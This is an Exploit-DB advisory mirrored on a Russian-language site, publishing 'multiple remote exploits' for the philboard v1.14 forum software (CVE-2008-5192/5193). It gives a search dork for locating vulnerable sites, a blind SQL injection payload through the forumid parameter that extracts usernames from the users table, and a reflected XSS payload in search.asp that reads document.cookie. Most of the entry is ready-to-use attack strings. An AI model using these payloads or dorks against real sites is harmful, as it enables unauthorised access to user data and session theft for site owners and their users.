- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5958
- Проверка EDB
-
- Пройдено
- Автор
- BL@CKBE@RD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5193 cve-2008-5192
- Дата публикации
- 2008-06-27
Код:
> [+] Script Name : philboard v 1.14 Multiple Remote Exploits
> |+| Team : InjEct0r5
> [+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;
> [+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
> [+] Dork : Powered by v1.14 powered by philboard v1.14
> --//-->
> [+] Expl0iT :
> Remote SQL Injection :
> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]
> Blind Way : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00
> Remote XSS Exploit :
> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]
[XSS] --> <script>alert(document.cookie)</script>
# milw0rm.com [2008-06-27]- Источник
- www.exploit-db.com
